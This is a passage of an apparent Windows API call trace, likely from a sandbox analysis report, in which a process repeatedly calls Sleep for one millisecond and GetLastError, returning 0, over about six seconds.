(dwMilliseconds=0x1) [0244.618] GetLastError () returned 0x0 [0244.618] Sleep (dwMilliseconds=0x1) [0244.634] GetLastError () returned 0x0 [0244.634] Sleep (dwMilliseconds=0x1) [0244.649] GetLastError () returned 0x0 [0244.650] Sleep (dwMilliseconds=0x1) [0244.665] GetLastError () returned 0x0 [0244.665] Sleep (dwMilliseconds=0x1) [0244.688] GetLastError () returned 0x0 [0244.688] Sleep (dwMilliseconds=0x1) [0244.696] GetLastError () returned 0x0 [0244.696] Sleep (dwMilliseconds=0x1) [0244.712] GetLastError () returned 0x0 [0244.712] Sleep (dwMilliseconds=0x1) [0244.727] GetLastError () returned 0x0 [0244.727] Sleep (dwMilliseconds=0x1) [0244.743] GetLastError () returned 0x0 [0244.743] Sleep (dwMilliseconds=0x1) [0244.759] GetLastError () returned 0x0 [0244.759] Sleep (dwMilliseconds=0x1) [0244.774] GetLastError () returned 0x0 [0244.774] Sleep (dwMilliseconds=0x1) [0244.790] GetLastError () returned 0x0 [0244.790] Sleep (dwMilliseconds=0x1) [0244.805] GetLastError () returned 0x0 [0244.805] Sleep (dwMilliseconds=0x1) [0244.821] GetLastError () returned 0x0 [0244.821] Sleep (dwMilliseconds=0x1) [0244.837] GetLastError () returned 0x0 [0244.837] Sleep (dwMilliseconds=0x1) [0244.853] GetLastError () returned 0x0 [0244.853] Sleep (dwMilliseconds=0x1) [0244.868] GetLastError () returned 0x0 [0244.868] Sleep (dwMilliseconds=0x1) [0244.883] GetLastError () returned 0x0 [0244.883] Sleep (dwMilliseconds=0x1) [0244.899] GetLastError () returned 0x0 [0244.899] Sleep (dwMilliseconds=0x1) [0244.915] GetLastError () returned 0x0 [0244.915] Sleep (dwMilliseconds=0x1) [0244.930] GetLastError () returned 0x0 [0244.930] Sleep (dwMilliseconds=0x1) [0244.946] GetLastError () returned 0x0 [0244.946] Sleep (dwMilliseconds=0x1) [0244.962] GetLastError () returned 0x0 [0244.962] Sleep (dwMilliseconds=0x1) [0244.977] GetLastError () returned 0x0 [0244.977] Sleep (dwMilliseconds=0x1) [0244.992] GetLastError () returned 0x0 [0244.992] Sleep (dwMilliseconds=0x1) [0245.008] GetLastError () returned 0x0 [0245.008] Sleep (dwMilliseconds=0x1) [0245.024] GetLastError () returned 0x0 [0245.024] Sleep (dwMilliseconds=0x1) [0245.039] GetLastError () returned 0x0 [0245.039] Sleep (dwMilliseconds=0x1) [0245.055] GetLastError () returned 0x0 [0245.055] Sleep (dwMilliseconds=0x1) [0245.071] GetLastError () returned 0x0 [0245.071] Sleep (dwMilliseconds=0x1) [0245.086] GetLastError () returned 0x0 [0245.086] Sleep (dwMilliseconds=0x1) [0245.102] GetLastError () returned 0x0 [0245.102] Sleep (dwMilliseconds=0x1) [0245.117] GetLastError () returned 0x0 [0245.117] Sleep (dwMilliseconds=0x1) [0245.133] GetLastError () returned 0x0 [0245.133] Sleep (dwMilliseconds=0x1) [0245.175] GetLastError () returned 0x0 [0245.175] Sleep (dwMilliseconds=0x1) [0245.180] GetLastError () returned 0x0 [0245.180] Sleep (dwMilliseconds=0x1) [0245.196] GetLastError () returned 0x0 [0245.196] Sleep (dwMilliseconds=0x1) [0245.211] GetLastError () returned 0x0 [0245.211] Sleep (dwMilliseconds=0x1) [0245.227] GetLastError () returned 0x0 [0245.227] Sleep (dwMilliseconds=0x1) [0245.242] GetLastError () returned 0x0 [0245.242] Sleep (dwMilliseconds=0x1) [0245.258] GetLastError () returned 0x0 [0245.258] Sleep (dwMilliseconds=0x1) [0245.273] GetLastError () returned 0x0 [0245.273] Sleep (dwMilliseconds=0x1) [0245.289] GetLastError () returned 0x0 [0245.289] Sleep (dwMilliseconds=0x1) [0245.305] GetLastError () returned 0x0 [0245.305] Sleep (dwMilliseconds=0x1) [0245.320] GetLastError () returned 0x0 [0245.320] Sleep (dwMilliseconds=0x1) [0245.336] GetLastError () returned 0x0 [0245.336] Sleep (dwMilliseconds=0x1) [0245.351] GetLastError () returned 0x0 [0245.351] Sleep (dwMilliseconds=0x1) [0245.367] GetLastError () returned 0x0 [0245.367] Sleep (dwMilliseconds=0x1) [0245.383] GetLastError () returned 0x0 [0245.383] Sleep (dwMilliseconds=0x1) [0245.398] GetLastError () returned 0x0 [0245.398] Sleep (dwMilliseconds=0x1) [0245.414] GetLastError () returned 0x0 [0245.414] Sleep (dwMilliseconds=0x1) [0245.429] GetLastError () returned 0x0 [0245.429] Sleep (dwMilliseconds=0x1) [0245.445] GetLastError () returned 0x0 [0245.445] Sleep (dwMilliseconds=0x1) [0245.460] GetLastError () returned 0x0 [0245.461] Sleep (dwMilliseconds=0x1) [0245.476] GetLastError () returned 0x0 [0245.476] Sleep (dwMilliseconds=0x1) [0245.496] GetLastError () returned 0x0 [0245.496] Sleep (dwMilliseconds=0x1) [0245.507] GetLastError () returned 0x0 [0245.508] Sleep (dwMilliseconds=0x1) [0245.523] GetLastError () returned 0x0 [0245.523] Sleep (dwMilliseconds=0x1) [0245.539] GetLastError () returned 0x0 [0245.539] Sleep (dwMilliseconds=0x1) [0245.554] GetLastError () returned 0x0 [0245.554] Sleep (dwMilliseconds=0x1) [0245.570] GetLastError () returned 0x0 [0245.570] Sleep (dwMilliseconds=0x1) [0245.587] GetLastError () returned 0x0 [0245.587] Sleep (dwMilliseconds=0x1) [0245.601] GetLastError () returned 0x0 [0245.601] Sleep (dwMilliseconds=0x1) [0245.617] GetLastError () returned 0x0 [0245.617] Sleep (dwMilliseconds=0x1) [0245.632] GetLastError () returned 0x0 [0245.632] Sleep (dwMilliseconds=0x1) [0245.648] GetLastError () returned 0x0 [0245.648] Sleep (dwMilliseconds=0x1) [0245.663] GetLastError () returned 0x0 [0245.663] Sleep (dwMilliseconds=0x1) [0245.679] GetLastError () returned 0x0 [0245.679] Sleep (dwMilliseconds=0x1) [0245.701] GetLastError () returned 0x0 [0245.701] Sleep (dwMilliseconds=0x1) [0245.710] GetLastError () returned 0x0 [0245.710] Sleep (dwMilliseconds=0x1) [0245.726] GetLastError () returned 0x0 [0245.726] Sleep (dwMilliseconds=0x1) [0245.741] GetLastError () returned 0x0 [0245.741] Sleep (dwMilliseconds=0x1) [0245.757] GetLastError () returned 0x0 [0245.757] Sleep (dwMilliseconds=0x1) [0245.772] GetLastError () returned 0x0 [0245.773] Sleep (dwMilliseconds=0x1) [0245.788] GetLastError () returned 0x0 [0245.788] Sleep (dwMilliseconds=0x1) [0245.804] GetLastError () returned 0x0 [0245.804] Sleep (dwMilliseconds=0x1) [0245.819] GetLastError () returned 0x0 [0245.819] Sleep (dwMilliseconds=0x1) [0245.835] GetLastError () returned 0x0 [0245.835] Sleep (dwMilliseconds=0x1) [0245.851] GetLastError () returned 0x0 [0245.851] Sleep (dwMilliseconds=0x1) [0245.866] GetLastError () returned 0x0 [0245.866] Sleep (dwMilliseconds=0x1) [0245.884] GetLastError () returned 0x0 [0245.884] Sleep (dwMilliseconds=0x1) [0245.897] GetLastError () returned 0x0 [0245.897] Sleep (dwMilliseconds=0x1) [0245.913] GetLastError () returned 0x0 [0245.913] Sleep (dwMilliseconds=0x1) [0245.928] GetLastError () returned 0x0 [0245.929] Sleep (dwMilliseconds=0x1) [0245.944] GetLastError () returned 0x0 [0245.944] Sleep (dwMilliseconds=0x1) [0245.960] GetLastError () returned 0x0 [0245.960] Sleep (dwMilliseconds=0x1) [0245.976] GetLastError () returned 0x0 [0245.976] Sleep (dwMilliseconds=0x1) [0245.991] GetLastError () returned 0x0 [0245.991] Sleep (dwMilliseconds=0x1) [0246.006] GetLastError () returned 0x0 [0246.007] Sleep (dwMilliseconds=0x1) [0246.022] GetLastError () returned 0x0 [0246.022] Sleep (dwMilliseconds=0x1) [0246.038] GetLastError () returned 0x0 [0246.038] Sleep (dwMilliseconds=0x1) [0246.054] GetLastError () returned 0x0 [0246.054] Sleep (dwMilliseconds=0x1) [0246.069] GetLastError () returned 0x0 [0246.069] Sleep (dwMilliseconds=0x1) [0246.085] GetLastError () returned 0x0 [0246.085] Sleep (dwMilliseconds=0x1) [0246.100] GetLastError () returned 0x0 [0246.100] Sleep (dwMilliseconds=0x1) [0246.116] GetLastError () returned 0x0 [0246.116] Sleep (dwMilliseconds=0x1) [0246.131] GetLastError () returned 0x0 [0246.131] Sleep (dwMilliseconds=0x1) [0246.165] GetLastError () returned 0x0 [0246.165] Sleep (dwMilliseconds=0x1) [0246.178] GetLastError () returned 0x0 [0246.178] Sleep (dwMilliseconds=0x1) [0246.194] GetLastError () returned 0x0 [0246.194] Sleep (dwMilliseconds=0x1) [0246.209] GetLastError () returned 0x0 [0246.209] Sleep (dwMilliseconds=0x1) [0246.225] GetLastError () returned 0x0 [0246.225] Sleep (dwMilliseconds=0x1) [0246.240] GetLastError () returned 0x0 [0246.240] Sleep (dwMilliseconds=0x1) [0246.256] GetLastError () returned 0x0 [0246.256] Sleep (dwMilliseconds=0x1) [0246.274] GetLastError () returned 0x0 [0246.274] Sleep (dwMilliseconds=0x1) [0246.288] GetLastError () returned 0x0 [0246.288] Sleep (dwMilliseconds=0x1) [0246.303] GetLastError () returned 0x0 [0246.303] Sleep (dwMilliseconds=0x1) [0246.319] GetLastError () returned 0x0 [0246.319] Sleep (dwMilliseconds=0x1) [0246.334] GetLastError () returned 0x0 [0246.334] Sleep (dwMilliseconds=0x1) [0246.350] GetLastError () returned 0x0 [0246.350] Sleep (dwMilliseconds=0x1) [0246.365] GetLastError () returned 0x0 [0246.365] Sleep (dwMilliseconds=0x1) [0246.381] GetLastError () returned 0x0 [0246.381] Sleep (dwMilliseconds=0x1) [0246.397] GetLastError () returned 0x0 [0246.397] Sleep (dwMilliseconds=0x1) [0246.416] GetLastError () returned 0x0 [0246.416] Sleep (dwMilliseconds=0x1) [0246.435] GetLastError () returned 0x0 [0246.435] Sleep (dwMilliseconds=0x1) [0246.443] GetLastError () returned 0x0 [0246.443] Sleep (dwMilliseconds=0x1) [0246.459] GetLastError () returned 0x0 [0246.459] Sleep (dwMilliseconds=0x1) [0246.475] GetLastError () returned 0x0 [0246.475] Sleep (dwMilliseconds=0x1) [0246.490] GetLastError () returned 0x0 [0246.490] Sleep (dwMilliseconds=0x1) [0246.506] GetLastError () returned 0x0 [0246.506] Sleep (dwMilliseconds=0x1) [0246.522] GetLastError () returned 0x0 [0246.522] Sleep (dwMilliseconds=0x1) [0246.537] GetLastError () returned 0x0 [0246.537] Sleep (dwMilliseconds=0x1) [0246.553] GetLastError () returned 0x0 [0246.553] Sleep (dwMilliseconds=0x1) [0246.568] GetLastError () returned 0x0 [0246.568] Sleep (dwMilliseconds=0x1) [0246.584] GetLastError () returned 0x0 [0246.584] Sleep (dwMilliseconds=0x1) [0246.600] GetLastError () returned 0x0 [0246.600] Sleep (dwMilliseconds=0x1) [0246.615] GetLastError () returned 0x0 [0246.615] Sleep (dwMilliseconds=0x1) [0246.630] GetLastError () returned 0x0 [0246.630] Sleep (dwMilliseconds=0x1) [0246.646] GetLastError () returned 0x0 [0246.646] Sleep (dwMilliseconds=0x1) [0246.662] GetLastError () returned 0x0 [0246.662] Sleep (dwMilliseconds=0x1) [0246.677] GetLastError () returned 0x0 [0246.677] Sleep (dwMilliseconds=0x1) [0246.693] GetLastError () returned 0x0 [0246.693] Sleep (dwMilliseconds=0x1) [0246.714] GetLastError () returned 0x0 [0246.714] Sleep (dwMilliseconds=0x1) [0246.724] GetLastError () returned 0x0 [0246.724] Sleep (dwMilliseconds=0x1) [0246.740] GetLastError () returned 0x0 [0246.740] Sleep (dwMilliseconds=0x1) [0246.755] GetLastError () returned 0x0 [0246.755] Sleep (dwMilliseconds=0x1) [0246.771] GetLastError () returned 0x0 [0246.771] Sleep (dwMilliseconds=0x1) [0246.787] GetLastError () returned 0x0 [0246.787] Sleep (dwMilliseconds=0x1) [0246.802] GetLastError () returned 0x0 [0246.802] Sleep (dwMilliseconds=0x1) [0246.818] GetLastError () returned 0x0 [0246.818] Sleep (dwMilliseconds=0x1) [0246.834] GetLastError () returned 0x0 [0246.834] Sleep (dwMilliseconds=0x1) [0246.849] GetLastError () returned 0x0 [0246.849] Sleep (dwMilliseconds=0x1) [0246.864] GetLastError () returned 0x0 [0246.864] Sleep (dwMilliseconds=0x1) [0246.880] GetLastError () returned 0x0 [0246.880] Sleep (dwMilliseconds=0x1) [0246.896] GetLastError () returned 0x0 [0246.896] Sleep (dwMilliseconds=0x1) [0246.911] GetLastError () returned 0x0 [0246.911] Sleep (dwMilliseconds=0x1) [0246.927] GetLastError () returned 0x0 [0246.927] Sleep (dwMilliseconds=0x1) [0246.943] GetLastError () returned 0x0 [0246.943] Sleep (dwMilliseconds=0x1) [0246.958] GetLastError () returned 0x0 [0246.958] Sleep (dwMilliseconds=0x1) [0246.974] GetLastError () returned 0x0 [0246.974] Sleep (dwMilliseconds=0x1) [0246.991] GetLastError () returned 0x0 [0246.991] Sleep (dwMilliseconds=0x1) [0247.005] GetLastError () returned 0x0 [0247.005] Sleep (dwMilliseconds=0x1) [0247.021] GetLastError () returned 0x0 [0247.021] Sleep (dwMilliseconds=0x1) [0247.036] GetLastError () returned 0x0 [0247.036] Sleep (dwMilliseconds=0x1) [0247.052] GetLastError () returned 0x0 [0247.052] Sleep (dwMilliseconds=0x1) [0247.067] GetLastError () returned 0x0 [0247.067] Sleep (dwMilliseconds=0x1) [0247.083] GetLastError () returned 0x0 [0247.083] Sleep (dwMilliseconds=0x1) [0247.099] GetLastError () returned 0x0 [0247.099] Sleep (dwMilliseconds=0x1) [0247.114] GetLastError () returned 0x0 [0247.114] Sleep (dwMilliseconds=0x1) [0247.130] GetLastError () returned 0x0 [0247.130] Sleep (dwMilliseconds=0x1) [0247.166] GetLastError () returned 0x0 [0247.166] Sleep (dwMilliseconds=0x1) [0247.177] GetLastError () returned 0x0 [0247.177] Sleep (dwMilliseconds=0x1) [0247.192] GetLastError () returned 0x0 [0247.192] Sleep (dwMilliseconds=0x1) [0247.208] GetLastError () returned 0x0 [0247.208] Sleep (dwMilliseconds=0x1) [0247.223] GetLastError () returned 0x0 [0247.223] Sleep (dwMilliseconds=0x1) [0247.239] GetLastError () returned 0x0 [0247.239] Sleep (dwMilliseconds=0x1) [0247.254] GetLastError () returned 0x0 [0247.255] Sleep (dwMilliseconds=0x1) [0247.270] GetLastError () returned 0x0 [0247.270] Sleep (dwMilliseconds=0x1) [0247.286] GetLastError () returned 0x0 [0247.286] Sleep (dwMilliseconds=0x1) [0247.301] GetLastError () returned 0x0 [0247.301] Sleep (dwMilliseconds=0x1) [0247.317] GetLastError () returned 0x0 [0247.317] Sleep (dwMilliseconds=0x1) [0247.333] GetLastError () returned 0x0 [0247.333] Sleep (dwMilliseconds=0x1) [0247.348] GetLastError () returned 0x0 [0247.348] Sleep (dwMilliseconds=0x1) [0247.364] GetLastError () returned 0x0 [0247.364] Sleep (dwMilliseconds=0x1) [0247.381] GetLastError () returned 0x0 [0247.381] Sleep (dwMilliseconds=0x1) [0247.395] GetLastError () returned 0x0 [0247.395] Sleep (dwMilliseconds=0x1) [0247.411] GetLastError () returned 0x0 [0247.411] Sleep (dwMilliseconds=0x1) [0247.426] GetLastError () returned 0x0 [0247.426] Sleep (dwMilliseconds=0x1) [0247.442] GetLastError () returned 0x0 [0247.442] Sleep (dwMilliseconds=0x1) [0247.457] GetLastError () returned 0x0 [0247.457] Sleep (dwMilliseconds=0x1) [0247.473] GetLastError () returned 0x0 [0247.473] Sleep (dwMilliseconds=0x1) [0247.489] GetLastError () returned 0x0 [0247.489] Sleep (dwMilliseconds=0x1) [0247.504] GetLastError () returned 0x0 [0247.504] Sleep (dwMilliseconds=0x1) [0247.520] GetLastError () returned 0x0 [0247.520] Sleep (dwMilliseconds=0x1) [0247.535] GetLastError () returned 0x0 [0247.535] Sleep (dwMilliseconds=0x1) [0247.552] GetLastError () returned 0x0 [0247.552] Sleep (dwMilliseconds=0x1) [0247.567] GetLastError () returned 0x0 [0247.567] Sleep (dwMilliseconds=0x1) [0247.582] GetLastError () returned 0x0 [0247.582] Sleep (dwMilliseconds=0x1) [0247.598] GetLastError () returned 0x0 [0247.598] Sleep (dwMilliseconds=0x1) [0247.613] GetLastError () returned 0x0 [0247.613] Sleep (dwMilliseconds=0x1) [0247.629] GetLastError () returned 0x0 [0247.629] Sleep (dwMilliseconds=0x1) [0247.645] GetLastError () returned 0x0 [0247.645] Sleep (dwMilliseconds=0x1) [0247.661] GetLastError () returned 0x0 [0247.661] Sleep (dwMilliseconds=0x1) [0247.676] GetLastError () returned 0x0 [0247.676] Sleep (dwMilliseconds=0x1) [0247.691] GetLastError () returned 0x0 [0247.691] Sleep (dwMilliseconds=0x1) [0247.707] GetLastError () returned 0x0 [0247.707] Sleep (dwMilliseconds=0x1) [0247.728] GetLastError () returned 0x0 [0247.728] Sleep (dwMilliseconds=0x1) [0247.738] GetLastError () returned 0x0 [0247.738] Sleep (dwMilliseconds=0x1) [0247.754] GetLastError () returned 0x0 [0247.754] Sleep (dwMilliseconds=0x1) [0247.769] GetLastError () returned 0x0 [0247.769] Sleep (dwMilliseconds=0x1) [0247.785] GetLastError () returned 0x0 [0247.785] Sleep (dwMilliseconds=0x1) [0247.801] GetLastError () returned 0x0 [0247.801] Sleep (dwMilliseconds=0x1) [0247.816] GetLastError () returned 0x0 [0247.816] Sleep (dwMilliseconds=0x1) [0247.832] GetLastError () returned 0x0 [0247.832] Sleep (dwMilliseconds=0x1) [0247.847] GetLastError () returned 0x0 [0247.847] Sleep (dwMilliseconds=0x1) [0247.863] GetLastError () returned 0x0 [0247.863] Sleep (dwMilliseconds=0x1) [0247.879] GetLastError () returned 0x0 [0247.879] Sleep (dwMilliseconds=0x1) [0247.894] GetLastError () returned 0x0 [0247.894] Sleep (dwMilliseconds=0x1) [0247.910] GetLastError () returned 0x0 [0247.910] Sleep (dwMilliseconds=0x1) [0247.926] GetLastError () returned 0x0 [0247.926] Sleep (dwMilliseconds=0x1) [0247.941] GetLastError () returned 0x0 [0247.941] Sleep (dwMilliseconds=0x1) [0247.956] GetLastError () returned 0x0 [0247.956] Sleep (dwMilliseconds=0x1) [0247.972] GetLastError () returned 0x0 [0247.972] Sleep (dwMilliseconds=0x1) [0247.988] GetLastError () returned 0x0 [0247.988] Sleep (dwMilliseconds=0x1) [0248.004] GetLastError () returned 0x0 [0248.004] Sleep (dwMilliseconds=0x1) [0248.019] GetLastError () returned 0x0 [0248.019] Sleep (dwMilliseconds=0x1) [0248.035] GetLastError () returned 0x0 [0248.035] Sleep (dwMilliseconds=0x1) [0248.050] GetLastError () returned 0x0 [0248.050] Sleep (dwMilliseconds=0x1) [0248.066] GetLastError () returned 0x0 [0248.066] Sleep (dwMilliseconds=0x1) [0248.081] GetLastError () returned 0x0 [0248.081] Sleep (dwMilliseconds=0x1) [0248.098] GetLastError () returned 0x0 [0248.098] Sleep (dwMilliseconds=0x1) [0248.112] GetLastError () returned 0x0 [0248.112] Sleep (dwMilliseconds=0x1) [0248.128] GetLastError () returned 0x0 [0248.128] Sleep (dwMilliseconds=0x1) [0248.162] GetLastError () returned 0x0 [0248.162] Sleep (dwMilliseconds=0x1) [0248.175] GetLastError () returned 0x0 [0248.175] Sleep (dwMilliseconds=0x1) [0248.190] GetLastError () returned 0x0 [0248.191] Sleep (dwMilliseconds=0x1) [0248.206] GetLastError () returned 0x0 [0248.206] Sleep (dwMilliseconds=0x1) [0248.222] GetLastError () returned 0x0 [0248.222] Sleep (dwMilliseconds=0x1) [0248.237] GetLastError () returned 0x0 [0248.237] Sleep (dwMilliseconds=0x1) [0248.253] GetLastError () returned 0x0 [0248.253] Sleep (dwMilliseconds=0x1) [0248.269] GetLastError () returned 0x0 [0248.269] Sleep (dwMilliseconds=0x1) [0248.284] GetLastError () returned 0x0 [0248.284] Sleep (dwMilliseconds=0x1) [0248.300] GetLastError () returned 0x0 [0248.300] Sleep (dwMilliseconds=0x1) [0248.315] GetLastError () returned 0x0 [0248.315] Sleep (dwMilliseconds=0x1) [0248.331] GetLastError () returned 0x0 [0248.331] Sleep (dwMilliseconds=0x1) [0248.347] GetLastError () returned 0x0 [0248.347] Sleep (dwMilliseconds=0x1) [0248.367] GetLastError () returned 0x0 [0248.367] Sleep (dwMilliseconds=0x1) [0248.378] GetLastError () returned 0x0 [0248.378] Sleep (dwMilliseconds=0x1) [0248.393] GetLastError () returned 0x0 [0248.393] Sleep (dwMilliseconds=0x1) [0248.409] GetLastError () returned 0x0 [0248.409] Sleep (dwMilliseconds=0x1) [0248.425] GetLastError () returned 0x0 [0248.425] Sleep (dwMilliseconds=0x1) [0248.440] GetLastError () returned 0x0 [0248.440] Sleep (dwMilliseconds=0x1) [0248.456] GetLastError () returned 0x0 [0248.456] Sleep (dwMilliseconds=0x1) [0248.471] GetLastError () returned 0x0 [0248.471] Sleep (dwMilliseconds=0x1) [0248.489] GetLastError () returned 0x0 [0248.489] Sleep (dwMilliseconds=0x1) [0248.502] GetLastError () returned 0x0 [0248.503] Sleep (dwMilliseconds=0x1) [0248.518] GetLastError () returned 0x0 [0248.518] Sleep (dwMilliseconds=0x1) [0248.534] GetLastError () returned 0x0 [0248.534] Sleep (dwMilliseconds=0x1) [0248.550] GetLastError () returned 0x0 [0248.550] Sleep (dwMilliseconds=0x1) [0248.565] GetLastError () returned 0x0 [0248.565] Sleep (dwMilliseconds=0x1) [0248.581] GetLastError () returned 0x0 [0248.581] Sleep (dwMilliseconds=0x1) [0248.596] GetLastError () returned 0x0 [0248.596] Sleep (dwMilliseconds=0x1) [0248.612] GetLastError () returned 0x0 [0248.612] Sleep (dwMilliseconds=0x1) [0248.627] GetLastError () returned 0x0 [0248.627] Sleep (dwMilliseconds=0x1) [0248.643] GetLastError () returned 0x0 [0248.643] Sleep (dwMilliseconds=0x1) [0248.659] GetLastError () returned 0x0 [0248.659] Sleep (dwMilliseconds=0x1) [0248.674] GetLastError () returned 0x0 [0248.674] Sleep (dwMilliseconds=0x1) [0248.690] GetLastError () returned 0x0 [0248.690] Sleep (dwMilliseconds=0x1) [0248.706] GetLastError () returned 0x0 [0248.706] Sleep (dwMilliseconds=0x1) [0248.721] GetLastError () returned 0x0 [0248.721] Sleep (dwMilliseconds=0x1) [0248.745] GetLastError () returned 0x0 [0248.745] Sleep (dwMilliseconds=0x1) [0248.752] GetLastError () returned 0x0 [0248.752] Sleep (dwMilliseconds=0x1) [0248.768] GetLastError () returned 0x0 [0248.768] Sleep (dwMilliseconds=0x1) [0248.783] GetLastError () returned 0x0 [0248.783] Sleep (dwMilliseconds=0x1) [0248.799] GetLastError () returned 0x0 [0248.799] Sleep (dwMilliseconds=0x1) [0248.816] GetLastError () returned 0x0 [0248.816] Sleep (dwMilliseconds=0x1) [0248.830] GetLastError () returned 0x0 [0248.830] Sleep (dwMilliseconds=0x1) [0248.847] GetLastError () returned 0x0 [0248.847] Sleep (dwMilliseconds=0x1) [0248.861] GetLastError () returned 0x0 [0248.861] Sleep (dwMilliseconds=0x1) [0248.877] GetLastError () returned 0x0 [0248.877] Sleep (dwMilliseconds=0x1) [0248.893] GetLastError () returned 0x0 [0248.893] Sleep (dwMilliseconds=0x1) [0248.908] GetLastError () returned 0x0 [0248.908] Sleep (dwMilliseconds=0x1) [0248.924] GetLastError () returned 0x0 [0248.924] Sleep (dwMilliseconds=0x1) [0248.939] GetLastError () returned 0x0 [0248.939] Sleep (dwMilliseconds=0x1) [0248.955] GetLastError () returned 0x0 [0248.955] Sleep (dwMilliseconds=0x1) [0248.971] GetLastError () returned 0x0 [0248.971] Sleep (dwMilliseconds=0x1) [0248.986] GetLastError () returned 0x0 [0248.986] Sleep (dwMilliseconds=0x1) [0249.002] GetLastError () returned 0x0 [0249.002] Sleep (dwMilliseconds=0x1) [0249.018] GetLastError () returned 0x0 [0249.018] Sleep (dwMilliseconds=0x1) [0249.033] GetLastError () returned 0x0 [0249.033] Sleep (dwMilliseconds=0x1) [0249.048] GetLastError () returned 0x0 [0249.049] Sleep (dwMilliseconds=0x1) [0249.064] GetLastError () returned 0x0 [0249.064] Sleep (dwMilliseconds=0x1) [0249.080] GetLastError () returned 0x0 [0249.080] Sleep (dwMilliseconds=0x1) [0249.095] GetLastError () returned 0x0 [0249.095] Sleep (dwMilliseconds=0x1) [0249.111] GetLastError () returned 0x0 [0249.111] Sleep (dwMilliseconds=0x1) [0249.127] GetLastError () returned 0x0 [0249.127] Sleep (dwMilliseconds=0x1) [0249.162] GetLastError () returned 0x0 [0249.162] Sleep (dwMilliseconds=0x1) [0249.173] GetLastError () returned 0x0 [0249.173] Sleep (dwMilliseconds=0x1) [0249.189] GetLastError () returned 0x0 [0249.189] Sleep (dwMilliseconds=0x1) [0249.205] GetLastError () returned 0x0 [0249.205] Sleep (dwMilliseconds=0x1) [0249.220] GetLastError () returned 0x0 [0249.220] Sleep (dwMilliseconds=0x1) [0249.236] GetLastError () returned 0x0 [0249.236] Sleep (dwMilliseconds=0x1) [0249.251] GetLastError () returned 0x0 [0249.251] Sleep (dwMilliseconds=0x1) [0249.267] GetLastError () returned 0x0 [0249.267] Sleep (dwMilliseconds=0x1) [0249.283] GetLastError () returned 0x0 [0249.283] Sleep (dwMilliseconds=0x1) [0249.298] GetLastError () returned 0x0 [0249.298] Sleep (dwMilliseconds=0x1) [0249.314] GetLastError () returned 0x0 [0249.314] Sleep (dwMilliseconds=0x1) [0249.329] GetLastError () returned 0x0 [0249.329] Sleep (dwMilliseconds=0x1) [0249.345] GetLastError () returned 0x0 [0249.345] Sleep (dwMilliseconds=0x1) [0249.360] GetLastError () returned 0x0 [0249.360] Sleep (dwMilliseconds=0x1) [0249.376] GetLastError () returned 0x0 [0249.376] Sleep (dwMilliseconds=0x1) [0249.392] GetLastError () returned 0x0 [0249.392] Sleep (dwMilliseconds=0x1) [0249.407] GetLastError () returned 0x0 [0249.407] Sleep (dwMilliseconds=0x1) [0249.423] GetLastError () returned 0x0 [0249.423] Sleep (dwMilliseconds=0x1) [0249.439] GetLastError () returned 0x0 [0249.439] Sleep (dwMilliseconds=0x1) [0249.454] GetLastError () returned 0x0 [0249.454] Sleep (dwMilliseconds=0x1) [0249.470] GetLastError () returned 0x0 [0249.470] Sleep (dwMilliseconds=0x1) [0249.486] GetLastError () returned 0x0 [0249.486] Sleep (dwMilliseconds=0x1) [0249.501] GetLastError () returned 0x0 [0249.501] Sleep (dwMilliseconds=0x1) [0249.516] GetLastError () returned 0x0 [0249.516] Sleep (dwMilliseconds=0x1) [0249.532] GetLastError () returned 0x0 [0249.533] Sleep (dwMilliseconds=0x1) [0249.574] GetLastError () returned 0x0 [0249.574] Sleep (dwMilliseconds=0x1) [0249.579] GetLastError () returned 0x0 [0249.579] Sleep (dwMilliseconds=0x1) [0249.597] GetLastError () returned 0x0 [0249.597] Sleep (dwMilliseconds=0x1) [0249.610] GetLastError () returned 0x0 [0249.610] Sleep (dwMilliseconds=0x1) [0249.626] GetLastError () returned 0x0 [0249.626] Sleep (dwMilliseconds=0x1) [0249.641] GetLastError () returned 0x0 [0249.641] Sleep (dwMilliseconds=0x1) [0249.657] GetLastError () returned 0x0 [0249.657] Sleep (dwMilliseconds=0x1) [0249.672] GetLastError () returned 0x0 [0249.672] Sleep (dwMilliseconds=0x1) [0249.688] GetLastError () returned 0x0 [0249.688] Sleep (dwMilliseconds=0x1) [0249.704] GetLastError () returned 0x0 [0249.704] Sleep (dwMilliseconds=0x1) [0249.719] GetLastError () returned 0x0 [0249.719] Sleep (dwMilliseconds=0x1) [0249.735] GetLastError () returned 0x0 [0249.735] Sleep (dwMilliseconds=0x1) [0249.758] GetLastError () returned 0x0 [0249.758] Sleep (dwMilliseconds=0x1) [0249.766] GetLastError () returned 0x0 [0249.766] Sleep (dwMilliseconds=0x1) [0249.782] GetLastError () returned 0x0 [0249.782] Sleep (dwMilliseconds=0x1) [0249.797] GetLastError () returned 0x0 [0249.797] Sleep (dwMilliseconds=0x1) [0249.813] GetLastError () returned 0x0 [0249.813] Sleep (dwMilliseconds=0x1) [0249.828] GetLastError () returned 0x0 [0249.829] Sleep (dwMilliseconds=0x1) [0249.844] GetLastError () returned 0x0 [0249.844] Sleep (dwMilliseconds=0x1) [0249.860] GetLastError () returned 0x0 [0249.860] Sleep (dwMilliseconds=0x1) [0249.875] GetLastError () returned 0x0 [0249.875] Sleep (dwMilliseconds=0x1) [0249.891] GetLastError () returned 0x0 [0249.891] Sleep (dwMilliseconds=0x1) [0249.907] GetLastError () returned 0x0 [0249.907] Sleep (dwMilliseconds=0x1) [0249.922] GetLastError () returned 0x0 [0249.922] Sleep (dwMilliseconds=0x1) [0249.938] GetLastError () returned 0x0 [0249.938] Sleep (dwMilliseconds=0x1) [0249.953] GetLastError () returned 0x0 [0249.953] Sleep (dwMilliseconds=0x1) [0249.969] GetLastError () returned 0x0 [0249.969] Sleep (dwMilliseconds=0x1) [0249.987] GetLastError () returned 0x0 [0249.987] Sleep (dwMilliseconds=0x1) [0250.000] GetLastError () returned 0x0 [0250.000] Sleep (dwMilliseconds=0x1) [0250.016] GetLastError () returned 0x0 [0250.016] Sleep (dwMilliseconds=0x1) [0250.032] GetLastError () returned 0x0 [0250.032] Sleep (dwMilliseconds=0x1) [0250.047] GetLastError () returned 0x0 [0250.051] Sleep (dwMilliseconds=0x1) [0250.062] GetLastError () returned 0x0 [0250.062] Sleep (dwMilliseconds=0x1) [0250.078] GetLastError () returned 0x0 [0250.078] Sleep (dwMilliseconds=0x1) [0250.094] GetLastError () returned 0x0 [0250.094] Sleep (dwMilliseconds=0x1) [0250.109] GetLastError () returned 0x0 [0250.109] Sleep (dwMilliseconds=0x1) [0250.125] GetLastError () returned 0x0 [0250.125] Sleep (dwMilliseconds=0x1) [0250.159] GetLastError () returned 0x0 